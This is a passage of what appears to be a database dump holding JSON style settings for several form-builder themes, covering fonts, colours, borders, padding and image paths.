bsolute\",\"CBPTop\":\"10px\",\"CBPRight\":\"10px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"18\",\"CBPFontWeight\":\"normal\",\"CBPColor\":\"#838383\",\"CBPPadding\":\"3px 5px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"30\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#ffffff\",\"CBHPBorderColor\":\"#737373\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#f3f3f3\",\"MBPFontSize\":\"17\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#354f5d\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#354f5d\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#b7b7b7\",\"MBHPColor\":\"#354f5d\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#354f5d\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#afafaf\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#ff1313\",\"OPDPIcon\":\"images/themes/date-pickers/2.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',0,2),(4,'Theme 4','{\"GPFontFamily\":\"Patrick Hand\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"30\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderTop\":\"top\",\"AGPBorderRight\":\"right\",\"AGPBorderBottom\":\"bottom\",\"AGPBorderLeft\":\"left\",\"AGPBorderColor\":\"#606060\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"0\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#ffffff\",\"HPWidth\":\"100\",\"HTPWidth\":\"30\",\"HPPadding\":\"10px\",\"HPMargin\":\"\",\"HPTextAlign\":\"center\",\"HPBorderColor\":\"#b7b7b7\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"1\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"26\",\"HTPWeight\":\"? string:? string:? string:? string:? string:? string:? string:? string:? string:? string:? string:? string:? string: ? ? ? ? ? ? ? ? ? ? ? ? ?\",\"HTPColor\":\"#930912\",\"HDPFontSize\":\"17\",\"HDPColor\":\"#666666\",\"HIPAlign\":\"left\",\"HIPWidth\":\"80\",\"HIPHeight\":\"\",\"GPBGColor\":\"#d8d8d8\",\"GPFontSize\":\"16\",\"GPFontWeight\":\"bold\",\"GPWidth\":\"100\",\"GTPWidth\":\"70\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#2d4d5f\",\"GPPadding\":\"10px\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"14\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#2d4d5f\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#d8d8d8\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"10px\",\"COPMargin\":\"0px\",\"FPWidth\":\"70\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"26\",\"IPFontSize\":\"14\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#ffffff\",\"IPColor\":\"#9c9c9c\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#dfdfdf\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/2.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"#ffffff\",\"SCPWidth\":\"16\",\"SCPHeight\":\"16\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#777777\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#777777\",\"SCCPWidth\":\"6\",\"SCCPHeight\":\"6\",\"SCCPMargin\":\"5\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"#ffffff\",\"MCPWidth\":\"16\",\"MCPHeight\":\"16\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#777777\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"\",\"MCCPBackground\":\"images/themes/checkboxes/1.png\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"16\",\"MCCPHeight\":\"16\",\"MCCPMargin\":\"0\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"right\",\"SPBGColor\":\"#930912\",\"SPWidth\":\"\",\"SPHeight\":\"\",\"SPFontSize\":\"16\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#e8e8e8\",\"SPPadding\":\"5px 8px\",\"SPMargin\":\"0 15px 0 0\",\"SPBorderTop\":\"top\",\"SPBorderRight\":\"right\",\"SPBorderBottom\":\"bottom\",\"SPBorderLeft\":\"left\",\"SPBorderColor\":\"#930912\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"1px 1px 2px #ccc\",\"SHPBGColor\":\"#51030b\",\"SHPColor\":\"#ffffff\",\"SHPBorderTop\":\"top\",\"SHPBorderRight\":\"right\",\"SHPBorderBottom\":\"bottom\",\"SHPBorderLeft\":\"left\",\"SHPBorderColor\":\"#51030b\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#666666\",\"BPWidth\":\"\",\"BPHeight\":\"\",\"BPFontSize\":\"16\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#ffffff\",\"BPPadding\":\"5px 8px\",\"BPMargin\":\"0 15px 0 0\",\"BPBorderTop\":\"top\",\"BPBorderRight\":\"right\",\"BPBorderBottom\":\"bottom\",\"BPBorderLeft\":\"left\",\"BPBorderColor\":\"#666666\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"1px 1px 2px #ccc\",\"BHPBGColor\":\"#2d4d5f\",\"BHPColor\":\"#ffffff\",\"BHPBorderTop\":\"top\",\"BHPBorderRight\":\"right\",\"BHPBorderBottom\":\"bottom\",\"BHPBorderLeft\":\"left\",\"BHPBorderColor\":\"#2d4d5f\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#930912\",\"PSAPFontSize\":\"16\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"8px\",\"PSAPMargin\":\"0 0 4px 0 \",\"PSAPBorderTop\":\"top\",\"PSAPBorderRight\":\"right\",\"PSAPBorderBottom\":\"bottom\",\"PSAPBorderLeft\":\"left\",\"PSAPBorderColor\":\"#930912\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"2\",\"PSAPBorderRadius\":\"3\",\"PSDPBGColor\":\"#2d4d5f\",\"PSDPFontSize\":\"16\",\"PSDPFontWeight\":\"normal\",\"PSDPColor\":\"#ffffff\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"4px 6px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderTop\":\"top\",\"PSDPBorderRight\":\"right\",\"PSDPBorderBottom\":\"bottom\",\"PSDPBorderLeft\":\"left\",\"PSDPBorderColor\":\"#2d4d5f\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"2\",\"PSDPBorderRadius\":\"3\",\"PSAPAlign\":\"right\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#666666\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#930912\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#666666\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#930912\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"-10px\",\"CBPRight\":\"5px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"#ffffff\",\"CBPFontSize\":\"12\",\"CBPFontWeight\":\"normal\",\"CBPColor\":\"#930912\",\"CBPPadding\":\"5px 7px\",\"CBPMargin\":\"0px\",\"CBPBorderTop\":\"top\",\"CBPBorderRight\":\"right\",\"CBPBorderBottom\":\"bottom\",\"CBPBorderLeft\":\"left\",\"CBPBorderColor\":\"#606060\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"15\",\"CBHPBGColor\":\"#ffffff\",\"CBHPColor\":\"#2d4d5f\",\"CBHPBorderTop\":\"top\",\"CBHPBorderRight\":\"right\",\"CBHPBorderBottom\":\"bottom\",\"CBHPBorderLeft\":\"left\",\"CBHPBorderColor\":\"#606060\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#ffffff\",\"MBPFontSize\":\"17\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#930912\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#606060\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#ffffff\",\"MBHPColor\":\"#666666\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#930912\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#afafaf\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#ff1313\",\"OPDPIcon\":\"images/themes/date-pickers/2.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',0,2),(5,'Theme 5','{\"GPFontFamily\":\"cursive\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"40\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderColor\":\"#ffffff\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"0\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#aee2de\",\"HPWidth\":\"100\",\"HTPWidth\":\"40\",\"HPPadding\":\"10px\",\"HPMargin\":\"\",\"HPTextAlign\":\"center\",\"HPBorderColor\":\"#b7b7b7\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"1\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"19\",\"HTPWeight\":\"normal\",\"HTPColor\":\"#042325\",\"HDPFontSize\":\"13\",\"HDPColor\":\"#518a88\",\"HIPAlign\":\"left\",\"HIPWidth\":\"80\",\"HIPHeight\":\"\",\"GPBGColor\":\"#214555\",\"GPFontSize\":\"15\",\"GPFontWeight\":\"normal\",\"GPWidth\":\"100\",\"GTPWidth\":\"60\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#d4d4d4\",\"GPPadding\":\"10px\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"14\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#d4d4d4\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#214555\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"10px\",\"COPMargin\":\"0px\",\"FPWidth\":\"70\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"26\",\"IPFontSize\":\"13\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#ffffff\",\"IPColor\":\"#518a88\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#dfdfdf\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/2.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"10px\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"#ffffff\",\"SCPWidth\":\"16\",\"SCPHeight\":\"16\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#518a88\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#518a88\",\"SCCPWidth\":\"6\",\"SCCPHeight\":\"6\",\"SCCPMargin\":\"5\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"#ffffff\",\"MCPWidth\":\"16\",\"MCPHeight\":\"16\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#518a88\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"\",\"MCCPBackground\":\"images/themes/checkboxes/1.png\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"16\",\"MCCPHeight\":\"16\",\"MCCPMargin\":\"0\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"left\",\"SPBGColor\":\"#f46322\",\"SPWidth\":\"130\",\"SPHeight\":\"26\",\"SPFontSize\":\"14\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"0px 5px\",\"SPMargin\":\"0 15px 0 0\",\"SPBorderTop\":\"top\",\"SPBorderRight\":\"right\",\"SPBorderBottom\":\"bottom\",\"SPBorderLeft\":\"left\",\"SPBorderColor\":\"#f46322\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"\",\"SHPBGColor\":\"#f46322\",\"SHPColor\":\"#ffffff\",\"SHPBorderTop\":\"top\",\"SHPBorderRight\":\"right\",\"SHPBorderBottom\":\"bottom\",\"SHPBorderLeft\":\"left\",\"SHPBorderColor\":\"#f46322\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#bababa\",\"BPWidth\":\"\",\"BPHeight\":\"26\",\"BPFontSize\":\"14\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#454545\",\"BPPadding\":\"0px 5px\",\"BPMargin\":\"0 15px 0 0\",\"BPBorderTop\":\"top\",\"BPBorderRight\":\"right\",\"BPBorderBottom\":\"bottom\",\"BPBorderLeft\":\"left\",\"BPBorderColor\":\"#bababa\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"\",\"BHPBGColor\":\"#bababa\",\"BHPColor\":\"#454545\",\"BHPBorderTop\":\"top\",\"BHPBorderRight\":\"right\",\"BHPBorderBottom\":\"bottom\",\"BHPBorderLeft\":\"left\",\"BHPBorderColor\":\"#bababa\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#f46322\",\"PSAPFontSize\":\"14\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"8px\",\"PSAPMargin\":\"0\",\"PSAPBorderColor\":\"\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"2\",\"PSAPBorderRadius\":\"3\",\"PSDPBGColor\":\"#bababa\",\"PSDPFontSize\":\"13\",\"PSDPFontWeight\":\"normal\",\"PSDPColor\":\"#518a88\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"4px 6px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderColor\":\"#a3a3a3\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"2\",\"PSDPBorderRadius\":\"3\",\"PSAPAlign\":\"left\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#f46322\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#d4d4d4\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#d4d4d4\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#f46322\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"6px\",\"CBPRight\":\"6px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"18\",\"CBPFontWeight\":\"normal\",\"CBPColor\":\"#f46322\",\"CBPPadding\":\"0px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"#ffffff\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"0\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#214555\",\"CBHPBorderColor\":\"#737373\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#aee2de\",\"MBPFontSize\":\"15\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#000000\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#518a88\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#518a88\",\"MBHPColor\":\"#ffffff\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#518a88\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#afafaf\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#ff1313\",\"OPDPIcon\":\"images/themes/date-pickers/2.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',0,2),(6,'Theme 6','{\"GPFontFamily\":\"PT Sans\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"35\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderColor\":\"#ffffff\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"0\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#ffffff\",\"HPWidth\":\"100\",\"HTPWidth\":\"40\",\"HPPadding\":\"10px\",\"HPMargin\":\"\",\"HPTextAlign\":\"center\",\"HPBorderColor\":\"#b7b7b7\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"1\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"27\",\"HTPWeight\":\"bold\",\"HTPColor\":\"#1d6d69\",\"HDPFontSize\":\"15\",\"HDPColor\":\"#808080\",\"HIPAlign\":\"left\",\"HIPWidth\":\"80\",\"HIPHeight\":\"\",\"GPBGColor\":\"#3a9391\",\"GPFontSize\":\"15\",\"GPFontWeight\":\"normal\",\"GPWidth\":\"100\",\"GTPWidth\":\"60\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#ffffff\",\"GPPadding\":\"10px\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"14\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#ffffff\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#3a9391\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"10px\",\"COPMargin\":\"0px\",\"FPWidth\":\"80\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"26\",\"IPFontSize\":\"13\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#ffffff\",\"IPColor\":\"#a0a0a0\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#d6d6d6\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/2.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"\",\"SCPWidth\":\"14\",\"SCPHeight\":\"14\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#ffffff\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#ffffff\",\"SCCPWidth\":\"8\",\"SCCPHeight\":\"8\",\"SCCPMargin\":\"3\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"\",\"MCPWidth\":\"14\",\"MCPHeight\":\"14\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#ffffff\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"#ffffff\",\"MCCPBackground\":\"\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"10\",\"MCCPHeight\":\"10\",\"MCCPMargin\":\"2\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"right\",\"SPBGColor\":\"#ffb33a\",\"SPWidth\":\"\",\"SPHeight\":\"\",\"SPFontSize\":\"15\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"6px 10px\",\"SPMargin\":\"0 15px 0 0\",\"SPBorderColor\":\"#1d6d69\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"2px 2px 2px #1d6d69\",\"SHPBGColor\":\"#f60c5b\",\"SHPColor\":\"#ffffff\",\"SHPBorderColor\":\"#ffffff\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#1d6d69\",\"BPWidth\":\"\",\"BPHeight\":\"\",\"BPFontSize\":\"15\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#ffffff\",\"BPPadding\":\"6px 10px\",\"BPMargin\":\"0 15px 0 0\",\"BPBorderColor\":\"#357773\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"2px 2px 2px #1d6d69\",\"BHPBGColor\":\"#35a098\",\"BHPColor\":\"#ffffff\",\"BHPBorderColor\":\"#ffffff\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#ffb33a\",\"PSAPFontSize\":\"16\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"8px\",\"PSAPMargin\":\"0 0 4px 0 